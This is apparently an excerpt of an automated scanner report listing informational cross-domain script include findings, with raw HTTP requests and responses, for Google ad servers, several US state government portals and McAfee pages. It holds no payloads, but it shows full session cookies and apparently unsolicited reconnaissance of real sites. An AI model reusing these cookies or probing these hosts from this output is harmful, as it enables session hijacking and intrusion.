Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_cc=true; s_nr=1304123774544; s_vnum=1306715774545%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:21:07 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 15743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304220270&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F30%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html&dt=1304202296534&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304202297631&frm=0&adk=1607234649&ga_vid=2144067088.1304202299&ga_sid=1304202299&ga_hid=1572867467&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=982&bih=919&fu=0&ifi=1&dtd=2466&xpc=z7ZdXAVapK&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 22:24:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4340

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304220568&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F30%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-www.ms.gov_80.htm&dt=1304202568971&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304202568977&frm=0&adk=1819763764&ga_vid=651511704.1304202569&ga_sid=1304202569&ga_hid=1967913101&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=998&bih=935&fu=0&ifi=1&dtd=16&xpc=wDMzXJdyQS&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 22:29:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.27. http://gov.louisiana.gov/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gov.louisiana.gov
Path:   /index.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.cfm HTTP/1.1
Host: gov.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:50 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</center>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.28. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c14b1274934572ff:TM=1304166055:LM=1304166055:S=6GKsyI7Du5NAVM93; expires=Mon, 29-Apr-2013 12:20:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 12:20:55 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

20.29. http://home.mcafee.com/AdviceCenter/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /AdviceCenter/Default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /AdviceCenter/Default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/AdviceCenter/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fAdviceCenter%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:00 GMT
Content-Length: 92200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<div style='padding-top:10px'><script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US'></script>
...[SNIP]...

20.30. https://home.mcafee.com/Secure/Protected/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /Secure/Protected/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Secure/Protected/Login.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:21 GMT
Content-Length: 52910
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<div id="sidebar"><script type="text/javascript" src="https://ad.doubleclick.net/adj/5880.mcafee.com.us/Login;cult=en-us;affid=0;pagename=login;pos=Right;sz=2X6;type=McAfee;tile=1;ord=9814985222005?"></script>
...[SNIP]...

20.31. http://ia.gov/livehelp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ia.gov
Path:   /livehelp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /livehelp.html HTTP/1.1
Host: ia.gov
Proxy-Connection: keep-alive
Referer: http://ia.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=p8pokrrg86sfk5b15r4349in42

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 May 2010 20:41:15 GMT
ETag: "c2882b6-384-4875d0fe1b0c0"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!-- COMMENT : Include the following line only once per page. -->
   <script language="javascript" type="text/javascript" src="http://js.livehelper.com/jsincludes/statusbutton.js"></script>
...[SNIP]...

20.32. http://idaho.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idaho.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: idaho.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:37 GMT
Server: IIC
expires: Sat, 30 Apr 2011 12:14:37 GMT
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 27899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</h1>
<script src="//www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<!--END FOOTER-->
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/IDAHOgov.json?callback=twitterCallback2&amp;count=1"></script>
...[SNIP]...

20.33. http://idaho.gov/public/portal/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idaho.gov
Path:   /public/portal/contact.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /public/portal/contact.html HTTP/1.1
Host: idaho.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=154226400.1304162086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=154226400.1209179509.1304162086.1304162086.1304162086.1; __utmc=154226400; __utmb=154226400.1.10.1304162086;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:00 GMT
Server: IIC
Content-Disposition: inline; filename="ScriptForm.contactform.ScriptStepView.general.defaultSkin"
Expires: -1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 17030
Set-Cookie: MoJoHammer.prod_public=c/VHBKP7qXcVnFndxxjC1tHJ5f4vWGWIAZzjmdHWS5i72Ip5Sdjn4q0JwHAzEp3IF6mbanT7bo5N; Path=/public/portal/contact.html
Set-Cookie: MoJoDuck.prod_public=+s+5473CNOXvAe5dCwqBdTrU/VhMX0tFAJFiX8GwBhX52Ip5Sdjn4q1cf0s4hU7IIZa8hQTBkWI9; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Contact Idaho.gov - Idaho.gov
...[SNIP]...
</a><script type="text/javascript" src="https://secure.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.34. http://idaho.gov/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idaho.gov
Path:   /search.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.html HTTP/1.1
Host: idaho.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=154226400.1304162086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=154226400.1209179509.1304162086.1304162086.1304162086.1; __utmc=154226400; __utmb=154226400.1.10.1304162086;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:08 GMT
Server: IIC
expires: Sat, 30 Apr 2011 13:21:09 GMT
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16126
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Search Results - Idaho.gov</t
...[SNIP]...
<meta name="PortalDecoratorMapper.forceDecorator" content="idahogov" />
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</h1>
<script src="//www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

20.35. http://in.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:33:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:34:22 GMT; path=/
Content-Length: 203267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<li>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.36. http://in.gov/core/agriculture.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/agriculture.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/agriculture.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:39:56 GMT; path=/
Content-Length: 197041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.37. http://in.gov/core/business.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/business.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/business.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:41:21 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1899300874.20480.0000; expires=Sat, 30-Apr-2011 01:42:21 GMT; path=/
Content-Length: 199220

